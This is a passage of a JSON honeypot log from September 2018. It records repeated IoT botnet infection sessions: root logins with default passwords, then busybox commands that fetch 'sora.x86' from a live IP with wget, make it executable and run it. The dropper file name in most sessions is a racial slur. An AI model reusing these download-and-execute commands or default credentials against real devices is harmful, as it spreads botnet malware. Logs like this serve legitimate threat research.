837. "eventid": "command.input",
838. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
839. },
840. {
841. "@timestamp": "2018-09-15T04:13:03.279Z",
842. "eventid": "command.input",
843. "input": "\u003e/.ptmx \u0026\u0026 cd /"
844. },
845. {
846. "@timestamp": "2018-09-15T04:13:03.277Z",
847. "eventid": "command.input",
848. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
849. },
850. {
851. "@timestamp": "2018-09-15T04:13:03.275Z",
852. "eventid": "command.input",
853. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
854. },
855. {
856. "@timestamp": "2018-09-15T04:13:03.273Z",
857. "eventid": "command.input",
858. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
859. },
860. {
861. "@timestamp": "2018-09-15T04:13:03.271Z",
862. "eventid": "command.input",
863. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
864. },
865. {
866. "@timestamp": "2018-09-15T04:13:03.269Z",
867. "eventid": "command.input",
868. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
869. },
870. {
871. "@timestamp": "2018-09-15T04:13:03.267Z",
872. "eventid": "command.input",
873. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
874. },
875. {
876. "@timestamp": "2018-09-15T04:13:03.265Z",
877. "eventid": "command.input",
878. "input": "sh"
879. },
880. {
881. "@timestamp": "2018-09-15T04:13:03.262Z",
882. "eventid": "command.input",
883. "input": "shell"
884. },
885. {
886. "@timestamp": "2018-09-15T04:13:03.259Z",
887. "eventid": "command.input",
888. "input": "system"
889. },
890. {
891. "@timestamp": "2018-09-15T04:13:03.217Z",
892. "eventid": "command.input",
893. "input": "enable"
894. },
895. {
896. "@timestamp": "2018-09-15T04:13:03.174Z",
897. "eventid": "command.input",
898. "input": ""
899. },
900. {
901. "@timestamp": "2018-09-15T04:13:02.886Z",
902. "eventid": "login.success",
903. "geoip": {
904. "city_name": "Las Vegas",
905. "country_name": "United States"
906. },
907. "password": "admin",
908. "username": "root"
909. }
910. ],
911. "3a622d1d2b9b": [
912. {
913. "@timestamp": "2018-09-15T04:13:16.132Z",
914. "eventid": "command.input",
915. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
916. },
917. {
918. "@timestamp": "2018-09-15T04:13:16.038Z",
919. "eventid": "command.input",
920. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
921. },
922. {
923. "@timestamp": "2018-09-15T04:13:15.665Z",
924. "eventid": "command.input",
925. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
926. },
927. {
928. "@timestamp": "2018-09-15T04:13:15.570Z",
929. "eventid": "command.input",
930. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
931. },
932. {
933. "@timestamp": "2018-09-15T04:13:15.480Z",
934. "eventid": "command.input",
935. "input": "/bin/busybox SORA"
936. },
937. {
938. "@timestamp": "2018-09-15T04:13:15.380Z",
939. "eventid": "command.input",
940. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
941. },
942. {
943. "@timestamp": "2018-09-15T04:13:15.279Z",
944. "eventid": "command.input",
945. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
946. },
947. {
948. "@timestamp": "2018-09-15T04:13:15.270Z",
949. "eventid": "command.input",
950. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
951. },
952. {
953. "@timestamp": "2018-09-15T04:13:15.269Z",
954. "eventid": "command.input",
955. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
956. },
957. {
958. "@timestamp": "2018-09-15T04:13:15.261Z",
959. "eventid": "command.input",
960. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
961. },
962. {
963. "@timestamp": "2018-09-15T04:13:15.259Z",
964. "eventid": "command.input",
965. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
966. },
967. {
968. "@timestamp": "2018-09-15T04:13:15.251Z",
969. "eventid": "command.input",
970. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
971. },
972. {
973. "@timestamp": "2018-09-15T04:13:15.249Z",
974. "eventid": "command.input",
975. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
976. },
977. {
978. "@timestamp": "2018-09-15T04:13:15.241Z",
979. "eventid": "command.input",
980. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
981. },
982. {
983. "@timestamp": "2018-09-15T04:13:15.239Z",
984. "eventid": "command.input",
985. "input": "\u003e/.ptmx \u0026\u0026 cd /"
986. },
987. {
988. "@timestamp": "2018-09-15T04:13:15.238Z",
989. "eventid": "command.input",
990. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
991. },
992. {
993. "@timestamp": "2018-09-15T04:13:15.230Z",
994. "eventid": "command.input",
995. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
996. },
997. {
998. "@timestamp": "2018-09-15T04:13:15.229Z",
999. "eventid": "command.input",
1000. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1001. },
1002. {
1003. "@timestamp": "2018-09-15T04:13:15.221Z",
1004. "eventid": "command.input",
1005. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1006. },
1007. {
1008. "@timestamp": "2018-09-15T04:13:15.219Z",
1009. "eventid": "command.input",
1010. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1011. },
1012. {
1013. "@timestamp": "2018-09-15T04:13:15.212Z",
1014. "eventid": "command.input",
1015. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1016. },
1017. {
1018. "@timestamp": "2018-09-15T04:13:15.210Z",
1019. "eventid": "command.input",
1020. "input": "sh"
1021. },
1022. {
1023. "@timestamp": "2018-09-15T04:13:15.208Z",
1024. "eventid": "command.input",
1025. "input": "shell"
1026. },
1027. {
1028. "@timestamp": "2018-09-15T04:13:15.206Z",
1029. "eventid": "command.input",
1030. "input": "system"
1031. },
1032. {
1033. "@timestamp": "2018-09-15T04:13:15.118Z",
1034. "eventid": "command.input",
1035. "input": "enable"
1036. },
1037. {
1038. "@timestamp": "2018-09-15T04:13:15.029Z",
1039. "eventid": "command.input",
1040. "input": ""
1041. },
1042. {
1043. "@timestamp": "2018-09-15T04:13:14.120Z",
1044. "eventid": "login.success",
1045. "geoip": {
1046. "city_name": "Las Vegas",
1047. "country_name": "United States"
1048. },
1049. "password": "admin",
1050. "username": "root"
1051. }
1052. ],
1053. "4a2173a89839": [
1054. {
1055. "@timestamp": "2018-09-15T04:13:08.756Z",
1056. "eventid": "command.input",
1057. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1058. },
1059. {
1060. "@timestamp": "2018-09-15T04:13:08.662Z",
1061. "eventid": "command.input",
1062. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1063. },
1064. {
1065. "@timestamp": "2018-09-15T04:13:08.277Z",
1066. "eventid": "command.input",
1067. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1068. },
1069. {
1070. "@timestamp": "2018-09-15T04:13:08.156Z",
1071. "eventid": "command.input",
1072. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1073. },
1074. {
1075. "@timestamp": "2018-09-15T04:13:08.007Z",
1076. "eventid": "command.input",
1077. "input": "/bin/busybox SORA"
1078. },
1079. {
1080. "@timestamp": "2018-09-15T04:13:07.896Z",
1081. "eventid": "command.input",
1082. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1083. },
1084. {
1085. "@timestamp": "2018-09-15T04:13:07.682Z",
1086. "eventid": "command.input",
1087. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1088. },
1089. {
1090. "@timestamp": "2018-09-15T04:13:07.673Z",
1091. "eventid": "command.input",
1092. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1093. },
1094. {
1095. "@timestamp": "2018-09-15T04:13:07.671Z",
1096. "eventid": "command.input",
1097. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1098. },
1099. {
1100. "@timestamp": "2018-09-15T04:13:07.664Z",
1101. "eventid": "command.input",
1102. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1103. },
1104. {
1105. "@timestamp": "2018-09-15T04:13:07.662Z",
1106. "eventid": "command.input",
1107. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1108. },
1109. {
1110. "@timestamp": "2018-09-15T04:13:07.661Z",
1111. "eventid": "command.input",
1112. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1113. },
1114. {
1115. "@timestamp": "2018-09-15T04:13:07.653Z",
1116. "eventid": "command.input",
1117. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1118. },
1119. {
1120. "@timestamp": "2018-09-15T04:13:07.651Z",
1121. "eventid": "command.input",
1122. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1123. },
1124. {
1125. "@timestamp": "2018-09-15T04:13:07.643Z",
1126. "eventid": "command.input",
1127. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1128. },
1129. {
1130. "@timestamp": "2018-09-15T04:13:07.642Z",
1131. "eventid": "command.input",
1132. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1133. },
1134. {
1135. "@timestamp": "2018-09-15T04:13:07.634Z",
1136. "eventid": "command.input",
1137. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1138. },
1139. {
1140. "@timestamp": "2018-09-15T04:13:07.632Z",
1141. "eventid": "command.input",
1142. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1143. },
1144. {
1145. "@timestamp": "2018-09-15T04:13:07.631Z",
1146. "eventid": "command.input",
1147. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1148. },
1149. {
1150. "@timestamp": "2018-09-15T04:13:07.623Z",
1151. "eventid": "command.input",
1152. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1153. },
1154. {
1155. "@timestamp": "2018-09-15T04:13:07.622Z",
1156. "eventid": "command.input",
1157. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1158. },
1159. {
1160. "@timestamp": "2018-09-15T04:13:07.620Z",
1161. "eventid": "command.input",
1162. "input": "sh"
1163. },
1164. {
1165. "@timestamp": "2018-09-15T04:13:07.613Z",
1166. "eventid": "command.input",
1167. "input": "shell"
1168. },
1169. {
1170. "@timestamp": "2018-09-15T04:13:07.611Z",
1171. "eventid": "command.input",
1172. "input": "system"
1173. },
1174. {
1175. "@timestamp": "2018-09-15T04:13:07.603Z",
1176. "eventid": "command.input",
1177. "input": "enable"
1178. },
1179. {
1180. "@timestamp": "2018-09-15T04:13:05.151Z",
1181. "eventid": "command.input",
1182. "input": ""
1183. },
1184. {
1185. "@timestamp": "2018-09-15T04:13:04.338Z",
1186. "eventid": "login.success",
1187. "geoip": {
1188. "city_name": "Las Vegas",
1189. "country_name": "United States"
1190. },
1191. "password": "root",
1192. "username": "root"
1193. }
1194. ],
1195. "754620698f23": [
1196. {
1197. "@timestamp": "2018-09-15T04:13:08.766Z",
1198. "eventid": "command.input",
1199. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1200. },
1201. {
1202. "@timestamp": "2018-09-15T04:13:08.659Z",
1203. "eventid": "command.input",
1204. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1205. },
1206. {
1207. "@timestamp": "2018-09-15T04:13:08.272Z",
1208. "eventid": "command.input",
1209. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1210. },
1211. {
1212. "@timestamp": "2018-09-15T04:13:08.161Z",
1213. "eventid": "command.input",
1214. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1215. },
1216. {
1217. "@timestamp": "2018-09-15T04:13:08.009Z",
1218. "eventid": "command.input",
1219. "input": "/bin/busybox SORA"
1220. },
1221. {
1222. "@timestamp": "2018-09-15T04:13:07.909Z",
1223. "eventid": "command.input",
1224. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1225. },
1226. {
1227. "@timestamp": "2018-09-15T04:13:07.767Z",
1228. "eventid": "command.input",
1229. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1230. },
1231. {
1232. "@timestamp": "2018-09-15T04:13:07.764Z",
1233. "eventid": "command.input",
1234. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1235. },
1236. {
1237. "@timestamp": "2018-09-15T04:13:07.757Z",
1238. "eventid": "command.input",
1239. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1240. },
1241. {
1242. "@timestamp": "2018-09-15T04:13:07.756Z",
1243. "eventid": "command.input",
1244. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1245. },
1246. {
1247. "@timestamp": "2018-09-15T04:13:07.748Z",
1248. "eventid": "command.input",
1249. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1250. },
1251. {
1252. "@timestamp": "2018-09-15T04:13:07.747Z",
1253. "eventid": "command.input",
1254. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1255. },
1256. {
1257. "@timestamp": "2018-09-15T04:13:07.745Z",
1258. "eventid": "command.input",
1259. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1260. },
1261. {
1262. "@timestamp": "2018-09-15T04:13:07.737Z",
1263. "eventid": "command.input",
1264. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1265. },
1266. {
1267. "@timestamp": "2018-09-15T04:13:07.736Z",
1268. "eventid": "command.input",
1269. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1270. },
1271. {
1272. "@timestamp": "2018-09-15T04:13:07.729Z",
1273. "eventid": "command.input",
1274. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1275. },
1276. {
1277. "@timestamp": "2018-09-15T04:13:07.727Z",
1278. "eventid": "command.input",
1279. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1280. },
1281. {
1282. "@timestamp": "2018-09-15T04:13:07.725Z",
1283. "eventid": "command.input",
1284. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1285. },
1286. {
1287. "@timestamp": "2018-09-15T04:13:07.721Z",
1288. "eventid": "command.input",
1289. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1290. },
1291. {
1292. "@timestamp": "2018-09-15T04:13:07.714Z",
1293. "eventid": "command.input",
1294. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1295. },
1296. {
1297. "@timestamp": "2018-09-15T04:13:07.711Z",
1298. "eventid": "command.input",
1299. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1300. },
1301. {
1302. "@timestamp": "2018-09-15T04:13:07.710Z",
1303. "eventid": "command.input",
1304. "input": "sh"
1305. },
1306. {
1307. "@timestamp": "2018-09-15T04:13:07.702Z",
1308. "eventid": "command.input",
1309. "input": "shell"
1310. },
1311. {
1312. "@timestamp": "2018-09-15T04:13:07.701Z",
1313. "eventid": "command.input",
1314. "input": "system"
1315. },
1316. {
1317. "@timestamp": "2018-09-15T04:13:07.693Z",
1318. "eventid": "command.input",
1319. "input": "enable"
1320. },
1321. {
1322. "@timestamp": "2018-09-15T04:13:05.981Z",
1323. "eventid": "command.input",
1324. "input": ""
1325. },
1326. {
1327. "@timestamp": "2018-09-15T04:13:05.152Z",
1328. "eventid": "login.success",
1329. "geoip": {
1330. "city_name": "Las Vegas",
1331. "country_name": "United States"
1332. },
1333. "password": "admin",
1334. "username": "root"
1335. }
1336. ],
1337. "8c6b47af4e07": [
1338. {
1339. "@timestamp": "2018-09-15T04:13:36.032Z",
1340. "eventid": "command.input",
1341. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1342. },
1343. {
1344. "@timestamp": "2018-09-15T04:13:35.945Z",
1345. "eventid": "command.input",
1346. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1347. },
1348. {
1349. "@timestamp": "2018-09-15T04:13:35.594Z",
1350. "eventid": "command.input",
1351. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1352. },
1353. {
1354. "@timestamp": "2018-09-15T04:13:35.505Z",
1355. "eventid": "command.input",
1356. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1357. },
1358. {
1359. "@timestamp": "2018-09-15T04:13:35.374Z",
1360. "eventid": "command.input",
1361. "input": "/bin/busybox SORA"
1362. },
1363. {
1364. "@timestamp": "2018-09-15T04:13:35.290Z",
1365. "eventid": "command.input",
1366. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1367. },
1368. {
1369. "@timestamp": "2018-09-15T04:13:35.200Z",
1370. "eventid": "command.input",
1371. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1372. },
1373. {
1374. "@timestamp": "2018-09-15T04:13:35.196Z",
1375. "eventid": "command.input",
1376. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1377. },
1378. {
1379. "@timestamp": "2018-09-15T04:13:35.194Z",
1380. "eventid": "command.input",
1381. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1382. },
1383. {
1384. "@timestamp": "2018-09-15T04:13:35.192Z",
1385. "eventid": "command.input",
1386. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1387. },
1388. {
1389. "@timestamp": "2018-09-15T04:13:35.190Z",
1390. "eventid": "command.input",
1391. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1392. },
1393. {
1394. "@timestamp": "2018-09-15T04:13:35.188Z",
1395. "eventid": "command.input",
1396. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1397. },
1398. {
1399. "@timestamp": "2018-09-15T04:13:35.185Z",
1400. "eventid": "command.input",
1401. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1402. },
1403. {
1404. "@timestamp": "2018-09-15T04:13:35.183Z",
1405. "eventid": "command.input",
1406. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1407. },
1408. {
1409. "@timestamp": "2018-09-15T04:13:35.180Z",
1410. "eventid": "command.input",
1411. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1412. },
1413. {
1414. "@timestamp": "2018-09-15T04:13:35.178Z",
1415. "eventid": "command.input",
1416. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1417. },
1418. {
1419. "@timestamp": "2018-09-15T04:13:35.175Z",
1420. "eventid": "command.input",
1421. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1422. },
1423. {
1424. "@timestamp": "2018-09-15T04:13:35.171Z",
1425. "eventid": "command.input",
1426. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1427. },
1428. {
1429. "@timestamp": "2018-09-15T04:13:35.168Z",
1430. "eventid": "command.input",
1431. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1432. },
1433. {
1434. "@timestamp": "2018-09-15T04:13:35.165Z",
1435. "eventid": "command.input",
1436. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1437. },
1438. {
1439. "@timestamp": "2018-09-15T04:13:35.163Z",
1440. "eventid": "command.input",
1441. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1442. },
1443. {
1444. "@timestamp": "2018-09-15T04:13:35.160Z",
1445. "eventid": "command.input",
1446. "input": "sh"
1447. },
1448. {
1449. "@timestamp": "2018-09-15T04:13:35.157Z",
1450. "eventid": "command.input",
1451. "input": "shell"
1452. },
1453. {
1454. "@timestamp": "2018-09-15T04:13:35.155Z",
1455. "eventid": "command.input",
1456. "input": "system"
1457. },
1458. {
1459. "@timestamp": "2018-09-15T04:13:35.073Z",
1460. "eventid": "command.input",
1461. "input": "enable"
1462. },
1463. {
1464. "@timestamp": "2018-09-15T04:13:34.993Z",
1465. "eventid": "command.input",
1466. "input": ""
1467. },
1468. {
1469. "@timestamp": "2018-09-15T04:13:34.500Z",
1470. "eventid": "login.success",
1471. "geoip": {
1472. "city_name": "Las Vegas",
1473. "country_name": "United States"
1474. },
1475. "password": "vizxv",
1476. "username": "root"
1477. }
1478. ],
1479. "9aebadf5f9db": [
1480. {
1481. "@timestamp": "2018-09-15T04:12:44.376Z",
1482. "eventid": "command.input",
1483. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1484. },
1485. {
1486. "@timestamp": "2018-09-15T04:12:44.330Z",
1487. "eventid": "command.input",
1488. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1489. },
1490. {
1491. "@timestamp": "2018-09-15T04:12:44.153Z",
1492. "eventid": "command.input",
1493. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1494. },
1495. {
1496. "@timestamp": "2018-09-15T04:12:44.104Z",
1497. "eventid": "command.input",
1498. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1499. },
1500. {
1501. "@timestamp": "2018-09-15T04:12:44.014Z",
1502. "eventid": "command.input",
1503. "input": "/bin/busybox SORA"
1504. },
1505. {
1506. "@timestamp": "2018-09-15T04:12:43.973Z",
1507. "eventid": "command.input",
1508. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1509. },
1510. {
1511. "@timestamp": "2018-09-15T04:12:43.924Z",
1512. "eventid": "command.input",
1513. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1514. },
1515. {
1516. "@timestamp": "2018-09-15T04:12:43.920Z",
1517. "eventid": "command.input",
1518. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1519. },
1520. {
1521. "@timestamp": "2018-09-15T04:12:43.918Z",
1522. "eventid": "command.input",
1523. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1524. },
1525. {
1526. "@timestamp": "2018-09-15T04:12:43.916Z",
1527. "eventid": "command.input",
1528. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1529. },
1530. {
1531. "@timestamp": "2018-09-15T04:12:43.914Z",
1532. "eventid": "command.input",
1533. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1534. },
1535. {
1536. "@timestamp": "2018-09-15T04:12:43.912Z",
1537. "eventid": "command.input",
1538. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1539. },
1540. {
1541. "@timestamp": "2018-09-15T04:12:43.910Z",
1542. "eventid": "command.input",
1543. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1544. },
1545. {
1546. "@timestamp": "2018-09-15T04:12:43.908Z",
1547. "eventid": "command.input",
1548. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1549. },
1550. {
1551. "@timestamp": "2018-09-15T04:12:43.906Z",
1552. "eventid": "command.input",
1553. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1554. },
1555. {
1556. "@timestamp": "2018-09-15T04:12:43.904Z",
1557. "eventid": "command.input",
1558. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1559. },
1560. {
1561. "@timestamp": "2018-09-15T04:12:43.902Z",
1562. "eventid": "command.input",
1563. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1564. },
1565. {
1566. "@timestamp": "2018-09-15T04:12:43.900Z",
1567. "eventid": "command.input",
1568. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
1569. },
1570. {
1571. "@timestamp": "2018-09-15T04:12:43.898Z",
1572. "eventid": "command.input",
1573. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
1574. },
1575. {
1576. "@timestamp": "2018-09-15T04:12:43.896Z",
1577. "eventid": "command.input",
1578. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
1579. },
1580. {
1581. "@timestamp": "2018-09-15T04:12:43.894Z",
1582. "eventid": "command.input",
1583. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
1584. },
1585. {
1586. "@timestamp": "2018-09-15T04:12:43.892Z",
1587. "eventid": "command.input",
1588. "input": "sh"
1589. },
1590. {
1591. "@timestamp": "2018-09-15T04:12:43.889Z",
1592. "eventid": "command.input",
1593. "input": "shell"
1594. },
1595. {
1596. "@timestamp": "2018-09-15T04:12:43.886Z",
1597. "eventid": "command.input",
1598. "input": "system"
1599. },
1600. {
1601. "@timestamp": "2018-09-15T04:12:43.844Z",
1602. "eventid": "command.input",
1603. "input": "enable"
1604. },
1605. {
1606. "@timestamp": "2018-09-15T04:12:43.801Z",
1607. "eventid": "command.input",
1608. "input": ""
1609. },
1610. {
1611. "@timestamp": "2018-09-15T04:12:43.514Z",
1612. "eventid": "login.success",
1613. "geoip": {
1614. "city_name": "Las Vegas",
1615. "country_name": "United States"
1616. },
1617. "password": "vizxv",
1618. "username": "root"
1619. }
1620. ],
1621. "9ec72e2fd074": [
1622. {
1623. "@timestamp": "2018-09-15T04:19:28.459Z",
1624. "eventid": "command.input",
1625. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
1626. },
1627. {
1628. "@timestamp": "2018-09-15T04:19:28.367Z",
1629. "eventid": "command.input",
1630. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
1631. },
1632. {
1633. "@timestamp": "2018-09-15T04:19:28.002Z",
1634. "eventid": "command.input",
1635. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1636. },
1637. {
1638. "@timestamp": "2018-09-15T04:19:27.907Z",
1639. "eventid": "command.input",
1640. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
1641. },
1642. {
1643. "@timestamp": "2018-09-15T04:19:27.772Z",
1644. "eventid": "command.input",
1645. "input": "/bin/busybox SORA"
1646. },
1647. {
1648. "@timestamp": "2018-09-15T04:19:27.680Z",
1649. "eventid": "command.input",
1650. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
1651. },
1652. {
1653. "@timestamp": "2018-09-15T04:19:27.580Z",
1654. "eventid": "command.input",
1655. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
1656. },
1657. {
1658. "@timestamp": "2018-09-15T04:19:27.571Z",
1659. "eventid": "command.input",
1660. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
1661. },
1662. {
1663. "@timestamp": "2018-09-15T04:19:27.570Z",
1664. "eventid": "command.input",
1665. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
1666. },
1667. {
1668. "@timestamp": "2018-09-15T04:19:27.561Z",
1669. "eventid": "command.input",
1670. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
1671. },
1672. {
1673. "@timestamp": "2018-09-15T04:19:27.559Z",
1674. "eventid": "command.input",
1675. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
1676. },
1677. {
1678. "@timestamp": "2018-09-15T04:19:27.552Z",
1679. "eventid": "command.input",
1680. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
1681. },
1682. {
1683. "@timestamp": "2018-09-15T04:19:27.550Z",
1684. "eventid": "command.input",
1685. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
1686. },
1687. {
1688. "@timestamp": "2018-09-15T04:19:27.542Z",
1689. "eventid": "command.input",
1690. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
1691. },
1692. {
1693. "@timestamp": "2018-09-15T04:19:27.540Z",
1694. "eventid": "command.input",
1695. "input": "\u003e/.ptmx \u0026\u0026 cd /"
1696. },
1697. {
1698. "@timestamp": "2018-09-15T04:19:27.531Z",
1699. "eventid": "command.input",
1700. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
1701. },
1702. {
1703. "@timestamp": "2018-09-15T04:19:27.529Z",
1704. "eventid": "command.input",
1705. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
1706. },
1707. {
